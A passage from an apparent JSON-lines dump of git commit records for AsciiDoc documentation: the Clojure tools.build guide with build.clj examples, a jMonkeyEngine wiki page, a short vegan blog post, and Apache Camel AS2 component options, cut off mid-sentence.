In this setup, we'll assume that your Clojure source is in `src\/` and Java source is in `java\/` (where you actually put these is of course up to you).\n\nThis build creates a jar with classes compiled from Java sources and your Clojure sources.\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn compile [_]\n (b\/javac {:src-dirs [\"java\"]\n :class-dir class-dir\n :basis basis\n :javac-opts [\"-source\" \"8\" \"-target\" \"8\"]}))\n\n(defn jar [_]\n (compile nil)\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file}))\n----\n\nThe `compile` task here can also be used as the <<deps_and_cli#prep_libs,prep task>> for this lib.\n\n== Task documentation\n\nSee the https:\/\/clojure.github.io\/tools.build[API docs] for detailed task documentation.\n","old_contents":"= tools.build Guide\nAlex Miller\n2021-06-22\n:type: guides\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nhttps:\/\/github.com\/clojure\/tools.build[tools.build] is a library of functions for building Clojure projects. It is intended to be used in a build program to create user-invokable target functions. Also see the https:\/\/clojure.github.io\/tools.build[API docs].\n\n== Builds are programs\n\nThe philosophy behind tools.build is that your project build is inherently a program - a series of instructions to create one or more project artifacts from your project source files. We want to write this program with our favorite programming language, Clojure, and tools.build is a library of functions commonly needed for builds that can be connected together in flexible ways. Writing a build program does take a bit more code than other declarative approaches, but can be easily extended or customized far into the future, creating a build that grows with your project.\n\n== Setup\n\nThere is no installation step - tools.build is simply a library that your build program uses. You will create an alias in your `deps.edn` that includes tools.build as a dependency and a source path to the build program. Builds are designed to be easily executed as a project \"tool\" in the Clojure CLI (with -T). In the Clojure CLI, \"tools\" are programs that provide functionality and do not use your project deps or classpath. 
Tools executed with `-T:an-alias` remove all project deps and paths, add `\".\"` as a path, and include any other deps or paths as defined in `:an-alias`.\n\nAs such, you will need an alias in your deps.edn that defines the build classpath and includes the path to your build source, for example:\n\n[source,clojure]\n----\n{:paths [\"src\"] ;; project paths\n :deps {} ;; project deps\n\n :aliases\n {;; Run with clj -T:build function-in-build\n :build {:deps {io.github.clojure\/tools.build {:tag \"TAG\" :sha \"SHA\"}}\n :ns-default build}}}\n----\n\nFind the most recent TAG and SHA to use at https:\/\/github.com\/clojure\/tools.build#release-information.\n\n[NOTE]\n====\nThe git dep and Clojure CLI examples in this guide assume the use of Clojure CLI 1.10.3.933 or higher.\n====\n\nAs mentioned above, running a tool with -T will create a classpath that does not include the project :paths and :deps. Using `-T:build` will use only the `:paths` and `:deps` from the `:build` alias. The root deps.edn is still included, which will pull in Clojure as well (but it would also come in as a dependency of tools.build). The `:paths` are not specified here, so no additional paths are added, however, `-T` includes the project root `\".\"` as a path by default.\n\nSo executing `clj -T:build jar` will use an effective classpath here of:\n\n* `\".\"` (added by -T)\n* org.clojure\/clojure (from the root deps.edn `:deps`) and transitive deps\n* org.clojure\/tools.build (from the `:build` alias `:deps`) and transitive deps\n\nThe `:ns-default` specifies the default Clojure namespace to find the function specified on the classpath. Because the only local path is the default `\".\"`, we should expect to find the build program at `build.clj` in the root of our project. Note that the path roots (via the `:build` alias `:paths`) and the namespace of the build program itself relative to those paths roots are fully under your control. You may wish to put them in a subdirectory of your project too.\n\nAnd then finally, on the command line we specify the function to run in the build, here `jar`. That function will be executed in the `build` namespace, and passed a map built using the same arg passing style as `-X` - args are provided as alternating keys and values.\n\nThe remainder of this guide demonstrates individual common use cases and how to satisfy them with tools.build programs.\n\n== Source library jar build\n\nThe most common Clojure build creates a jar file containing Clojure source code. 
To do this with tools.build we'll use the following tasks:\n\n* `create-basis` - to create a project basis\n* `copy-dir` - to copy Clojure source and resources into a working dir\n* `write-pom` - to write a pom file in the working dir\n* `jar` - to jar up the working dir into a jar file\n\nThe build.clj will look like this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn jar [_]\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file}))\n----\n\nSome things to notice:\n\n* This is just normal Clojure code - you can load this namespace in your editor and develop it interactively at the REPL.\n* As a single-purpose program, it's fine to build shared data in the set of vars at the top.\n* We are choosing to build in the \"target\" directory and assemble the jar contents in \"target\/classes\" but there is nothing special about these paths - it is fully in your control. Also, we've repeated those paths and others in multiple places here but you can remove that duplication to the extent that feels right.\n* We've used the tools.build task functions to assemble larger functions like `build\/jar` for the user to invoke. These functions take a parameter map and we've chosen not to provide any configurable parameters here, but you could!\n\nThe deps.edn file will look like this:\n\n[source,clojure]\n----\n{:paths [\"src\"]\n :aliases\n {:build {:deps {io.github.clojure\/tools.build {:tag \"TAG\" :sha \"SHA\"}}\n :ns-default build}}}\n----\n\nAnd then you can run this build with:\n\n[source,shell]\n----\nclj -T:build clean\nclj -T:build jar\n----\n\nWe expect to be able to do these both together on the command line but that is a work in progress.\n\n== Compiled uberjar application build\n\nWhen preparing an application, it is common to compile the full app + libs and assemble the entire thing as a single uberjar.\n\nIt is important that your main Clojure namespace should have `(:gen-class)`, for example:\n\n[source,clojure]\n----\n(ns my.lib.main\n ;; any :require and\/or :import clauses\n (:gen-class))\n----\n\nAnd that namespace should have a function like:\n\n[source,clojure]\n----\n(defn -main [& args]\n (do-stuff))\n----\n\nAn example build for a compiled uberjar will look like this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def uber-file (format \"target\/%s-%s-standalone.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn uber [_]\n (clean nil)\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/compile-clj {:basis basis\n :src-dirs [\"src\"]\n :class-dir class-dir})\n (b\/uber {:class-dir class-dir\n :uber-file uber-file\n :basis basis\n :main 'my.lib.main}))\n----\n\nThe deps.edn and build execution will look the same as the prior example.\n\nYou can create the uber jar build with:\n\n[source]\n----\nclj 
-T:build uber\n----\n\nThe output of this build will be an uberjar at `target\/lib1-1.2.100-standalone.jar`. That jar contains both a compiled version of this project and all of its dependencies. The uberjar will have a manifest referring to the `my.lib.main` namespace (which should have a `-main` method) and can be invoked like this:\n\n[source]\n----\njava -jar target\/lib1-1.2.100-standalone.jar\n----\n\n== Parameterized builds\n\nIn the builds above we did not parameterize any aspect of the build, just chose which functions to call. You may find that it's useful to parameterize your builds to differentiate dev\/qa\/prod, or version, or some other factor. To account for function chaining at the command line, it is advisable to establish the common set of parameters to use across your build functions and have each function pass the parameters along.\n\nFor example, consider a parameterization that includes an extra set of dev resources to set a local developer environment. We'll use a simple `:env :dev` kv pair to indicate this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n(def copy-srcs [\"src\" \"resources\"])\n\n(defn clean [params]\n (b\/delete {:path \"target\"})\n params)\n\n(defn jar [{:keys [env] :as params}]\n (let [srcs (if (= env :dev) (cons \"dev-resources\" copy-srcs) copy-srcs)]\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs srcs\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file})\n params))\n----\n\nThe other aspects of deps.edn and invocation remain the same. \n\nInvocation that activates :dev environment will look like this:\n\n[source,shell]\n----\nclj -T:build jar :env :dev\n----\n\nThe kv params are passed to the `jar` function.\n\n== Mixed Java \/ Clojure build\n\nA common case that occurs is needing to introduce a Java implementation class or two into a mostly Clojure project. In this case, you need to compile the Java classes and include them with your Clojure source. 
In this setup, we'll assume that your Clojure source is in `src\/` and Java source is in `java\/` (where you actually put these is of course up to you).\n\nThis build creates a jar with classes compiled from Java sources and your Clojure sources.\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn compile [_]\n (b\/javac {:src-dirs [\"java\"]\n :class-dir class-dir\n :basis basis\n :javac-opts [\"-source\" \"8\" \"-target\" \"8\"]}))\n\n(defn jar [_]\n (compile nil)\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file}))\n----\n\nThe `compile` task here can also be used as the <<deps_and_cli#prep_libs,prep task>> for this lib.\n\n== Task documentation\n\nSee the https:\/\/clojure.github.io\/tools.build[API docs] for detailed task documentation.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b94688c8d0a5cd9c41b94803daa198c8d55cfcd5","subject":"turned link into image.","message":"turned link into image.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/rise_of_mutants_project.adoc","new_file":"src\/docs\/asciidoc\/jme3\/rise_of_mutants_project.adoc","new_contents":"= rise_of_mutants_project\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nRise of Mutants project by BigBootsTeam.\n\nProject is hosted here: link:https:\/\/code.google.com\/p\/rise-of-mutants\/source\/list[https:\/\/code.google.com\/p\/rise-of-mutants\/source\/list]\n\nFeatures:\n\n- World Editor is Blender (export to Ogre scene).\n\n- Entity System.\n\n- Ready Framework.\n\n- Ready Gameplay.\n\n- Model Viewer tool.\n\n- LightBlow Shader is used.\n\nScreenShot: image:https:\/\/i.imgur.com\/uFRw4.jpg[https:\/\/i.imgur.com\/uFRw4.jpg]\n\nVideo:\n\nimage::jme3\/riseofmutants3.jpg[youtu.be\/_aFSEJlISyI,width=\"\",height=\"\",link=\"https:\/\/youtu.be\/_aFSEJlISyI\"]\n","old_contents":"= rise_of_mutants_project\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nRise of Mutants project by BigBootsTeam.\n\nProject is hosted here: link:https:\/\/code.google.com\/p\/rise-of-mutants\/source\/list[https:\/\/code.google.com\/p\/rise-of-mutants\/source\/list]\n\nFeatures:\n\n- World Editor is Blender (export to Ogre scene).\n\n- Entity System.\n\n- Ready Framework.\n\n- Ready Gameplay.\n\n- Model Viewer tool.\n\n- LightBlow Shader is used.\n\nScreenShot: link:https:\/\/i.imgur.com\/uFRw4.jpg[https:\/\/i.imgur.com\/uFRw4.jpg]\n\nVideo:\n\nimage::jme3\/riseofmutants3.jpg[youtu.be\/_aFSEJlISyI,width=\"\",height=\"\",link=\"https:\/\/youtu.be\/_aFSEJlISyI\"]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"84369abc69cb8a157dc6116cc451c1bbaf4c5aec","subject":"shorten topic","message":"shorten 
topic\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/tutorials\/nav.adoc","new_file":"docs\/modules\/tutorials\/nav.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"1392a227558fc234df5980bc375e141ff5b1b93d","subject":"Update 2016-09-11-Going-Vegan.adoc","message":"Update 2016-09-11-Going-Vegan.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-09-11-Going-Vegan.adoc","new_file":"_posts\/2016-09-11-Going-Vegan.adoc","new_contents":"= Going Vegan!\n\n:hp-tags: [vegan]\n\nMy name is Roxanne Joncas. I am a Canadian living in Kiel, Germany. For the past two years, I have been a \"vegepreferian\" (term coined by my friend Wayne) that indulges in minimalism. I have decided to make my lifestyle a more sensible, mindful, and conscious one. That is why I have decided to become vegan. I will be posting my journey on my https:\/\/www.youtube.com\/channel\/UC3u3YZ35NU1Zl3zxRH3d7OA[YouTube Channel].\n\nJoin in on the fun, follow my journey or become a vegan and share your thoughts\/ideas!\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/jZylH73e-lA\" frameborder=\"0\" allowfullscreen><\/iframe>\n++++","old_contents":"= Going Vegan!\n\n:hp-tags: [vegan]\n\nMy name is Roxanne Joncas. I am Canadian living in Kiel, Germany. For the past two years, I have been a \"vegepreferian\" (term coined by my friend Wayne) that indulges in minimalism. I have decided to make my lifestyle a more sensible, mindful, and conscious one. That is why I have decided to become vegan. 
I will be posting my journey on my https:\/\/www.youtube.com\/channel\/UC3u3YZ35NU1Zl3zxRH3d7OA[YouTube Channel].\n\nJoin in on the fun, follow my journey or become a vegan and share your thoughts\/ideas!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"35c9478b7899e2abf8fec823e10a510cbedc13fa","subject":"Camel-AS2: Improve NOTE section","message":"Camel-AS2: Improve NOTE section\n","repos":"apache\/camel,nicolaferraro\/camel,pax95\/camel,DariusX\/camel,zregvart\/camel,tadayosi\/camel,mcollovati\/camel,pax95\/camel,CodeSmell\/camel,cunningt\/camel,apache\/camel,nicolaferraro\/camel,mcollovati\/camel,gnodet\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,mcollovati\/camel,zregvart\/camel,pax95\/camel,cunningt\/camel,tdiesler\/camel,CodeSmell\/camel,pax95\/camel,tdiesler\/camel,ullgren\/camel,pax95\/camel,DariusX\/camel,alvinkwekel\/camel,alvinkwekel\/camel,adessaigne\/camel,tadayosi\/camel,tadayosi\/camel,CodeSmell\/camel,DariusX\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,ullgren\/camel,christophd\/camel,ullgren\/camel,nicolaferraro\/camel,zregvart\/camel,tdiesler\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,christophd\/camel,ullgren\/camel,gnodet\/camel,DariusX\/camel,pmoerenhout\/camel,tadayosi\/camel,adessaigne\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel,nikhilvibhav\/camel,gnodet\/camel,tadayosi\/camel,christophd\/camel,CodeSmell\/camel,tdiesler\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,christophd\/camel,zregvart\/camel,pmoerenhout\/camel,nicolaferraro\/camel,christophd\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,tdiesler\/camel,cunningt\/camel,tdiesler\/camel,gnodet\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,mcollovati\/camel,apache\/camel,adessaigne\/camel","old_file":"components\/camel-as2\/camel-as2-component\/src\/main\/docs\/as2-component.adoc","new_file":"components\/camel-as2\/camel-as2-component\/src\/main\/docs\/as2-component.adoc","new_contents":"[[as2-component]]\n= AS2 Component\n\n*Since Camel 2.22*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe AS2 component provides transport of EDI messages using the HTTP transfer protocol\nas specified in https:\/\/tools.ietf.org\/html\/rfc4130[RFC4130]. \n\n[NOTE]\n====\nThis component is currently a work in progress. Expect URI options and path and query parameters to change in future versions of this component.\n==== \n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-as2<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n== URI format\n\n[source]\n----\nas2:\/\/apiName\/methodName\n----\n\napiName can be one of:\n\n* client\n* server\n\n\n== AS2 Options\n\n\n\/\/ component options: START\nThe AS2 component supports 4 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | To use the shared configuration | | AS2Configuration\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). 
By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n\n\/\/ endpoint options: START\nThe AS2 endpoint is configured using URI syntax:\n\n----\nas2:apiName\/methodName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (2 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiName* | *Required* What kind of operation to perform | | AS2ApiName\n| *methodName* | *Required* What sub operation to use for the selected operation | | String\n|===\n\n\n=== Query Parameters (49 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *as2From* (common) | The value of the AS2From header of AS2 message. | | String\n| *as2MessageStructure* (common) | The structure of AS2 Message. One of: PLAIN - No encryption, no signature, SIGNED - No encryption, signature, ENCRYPTED - Encryption, no signature, ENCRYPTED_SIGNED - Encryption, signature | | AS2MessageStructure\n| *as2To* (common) | The value of the AS2To header of AS2 message. | | String\n| *as2Version* (common) | The version of the AS2 protocol. | 1.1 | String\n| *clientFqdn* (common) | The Client Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *compressionAlgorithm* (common) | The algorithm used to compress EDI message. | | AS2CompressionAlgorithm\n| *decryptingPrivateKey* (common) | The key used to decrypt the EDI message. | | PrivateKey\n| *dispositionNotificationTo* (common) | The value of the Disposition-Notification-To header. Assigning a value to this parameter requests a message disposition notification (MDN) for the AS2 message. | | String\n| *ediMessageTransferEncoding* (common) | The transfer encoding of EDI message. | | String\n| *ediMessageType* (common) | The content type of EDI message. One of application\/edifact, application\/edi-x12, application\/edi-consent | | ContentType\n| *encryptingAlgorithm* (common) | The algorithm used to encrypt EDI message. | | AS2EncryptionAlgorithm\n| *encryptingCertificateChain* (common) | The chain of certificates used to encrypt EDI message. | | Certificate[]\n| *from* (common) | The value of the From header of AS2 message. | | String\n| *inBody* (common) | Sets the name of a parameter to be passed in the exchange In Body | | String\n| *mdnMessageTemplate* (common) | The template used to format MDN message | | String\n| *requestUri* (common) | The request URI of EDI message. 
| \/ | String\n| *server* (common) | The value included in the Server message header identifying the AS2 Server. | Camel AS2 Server Endpoint | String\n| *serverFqdn* (common) | The Server Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *serverPortNumber* (common) | The port number of server. | | Integer\n| *signedReceiptMicAlgorithms* (common) | The list of algorithms, in order of preference, requested to generate a message integrity check (MIC) returned in message disposition notification (MDN) | | String[]\n| *signingAlgorithm* (common) | The algorithm used to sign EDI message. | | AS2SignatureAlgorithm\n| *signingCertificateChain* (common) | The chain of certificates used to sign EDI message. | | Certificate[]\n| *signingPrivateKey* (common) | The key used to sign the EDI message. | | PrivateKey\n| *subject* (common) | The value of Subject header of AS2 message. | | String\n| *targetHostname* (common) | The host name (IP or DNS name) of target host. | | String\n| *targetPortNumber* (common) | The port number of target host. -1 indicates the scheme default port. | | Integer\n| *userAgent* (common) | The value included in the User-Agent message header identifying the AS2 user agent. | Camel AS2 Client Endpoint | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. 
| false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component | none | String\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. 
| true | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n  <groupId>org.apache.camel.springboot<\/groupId>\n  <artifactId>camel-as2-starter<\/artifactId>\n  <version>x.x.x<\/version>\n  <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 32 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.as2.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.as2.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.as2.configuration.api-name* | What kind of operation to perform | | AS2ApiName\n| *camel.component.as2.configuration.as2-from* | The value of the AS2From header of AS2 message. | | String\n| *camel.component.as2.configuration.as2-message-structure* | The structure of AS2 Message. One of: PLAIN - No encryption, no signature, SIGNED - No encryption, signature, ENCRYPTED - Encryption, no signature, ENCRYPTED_SIGNED - Encryption, signature | | AS2MessageStructure\n| *camel.component.as2.configuration.as2-to* | The value of the AS2To header of AS2 message. | | String\n| *camel.component.as2.configuration.as2-version* | The version of the AS2 protocol. | 1.1 | String\n| *camel.component.as2.configuration.client-fqdn* | The Client Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *camel.component.as2.configuration.compression-algorithm* | The algorithm used to compress EDI message. | | AS2CompressionAlgorithm\n| *camel.component.as2.configuration.decrypting-private-key* | The key used to decrypt the EDI message. | | PrivateKey\n| *camel.component.as2.configuration.disposition-notification-to* | The value of the Disposition-Notification-To header. Assigning a value to this parameter requests a message disposition notification (MDN) for the AS2 message. | | String\n| *camel.component.as2.configuration.edi-message-transfer-encoding* | The transfer encoding of EDI message. | | String\n| *camel.component.as2.configuration.edi-message-type* | The content type of EDI message. One of application\/edifact, application\/edi-x12, application\/edi-consent | | ContentType\n| *camel.component.as2.configuration.encrypting-algorithm* | The algorithm used to encrypt EDI message. | | AS2EncryptionAlgorithm\n| *camel.component.as2.configuration.encrypting-certificate-chain* | The chain of certificates used to encrypt EDI message. | | Certificate[]\n| *camel.component.as2.configuration.from* | The value of the From header of AS2 message. 
| | String\n| *camel.component.as2.configuration.mdn-message-template* | The template used to format MDN message | | String\n| *camel.component.as2.configuration.method-name* | What sub operation to use for the selected operation | | String\n| *camel.component.as2.configuration.request-uri* | The request URI of EDI message. | \/ | String\n| *camel.component.as2.configuration.server* | The value included in the Server message header identifying the AS2 Server. | Camel AS2 Server Endpoint | String\n| *camel.component.as2.configuration.server-fqdn* | The Server Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *camel.component.as2.configuration.server-port-number* | The port number of server. | | Integer\n| *camel.component.as2.configuration.signed-receipt-mic-algorithms* | The list of algorithms, in order of preference, requested to generate a message integrity check (MIC) returned in message disposition notification (MDN) | | String[]\n| *camel.component.as2.configuration.signing-algorithm* | The algorithm used to sign EDI message. | | AS2SignatureAlgorithm\n| *camel.component.as2.configuration.signing-certificate-chain* | The chain of certificates used to sign EDI message. | | Certificate[]\n| *camel.component.as2.configuration.signing-private-key* | The key used to sign the EDI message. | | PrivateKey\n| *camel.component.as2.configuration.subject* | The value of Subject header of AS2 message. | | String\n| *camel.component.as2.configuration.target-hostname* | The host name (IP or DNS name) of target host. | | String\n| *camel.component.as2.configuration.target-port-number* | The port number of target host. -1 indicates the scheme default port. | | Integer\n| *camel.component.as2.configuration.user-agent* | The value included in the User-Agent message header identifying the AS2 user agent. | Camel AS2 Client Endpoint | String\n| *camel.component.as2.enabled* | Whether to enable auto configuration of the as2 component. This is enabled by default. | | Boolean\n| *camel.component.as2.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n== Client Endpoints:\n\nClient endpoints use the endpoint prefix *`client`* followed by the name of a method\nand associated options described next. The endpoint URI 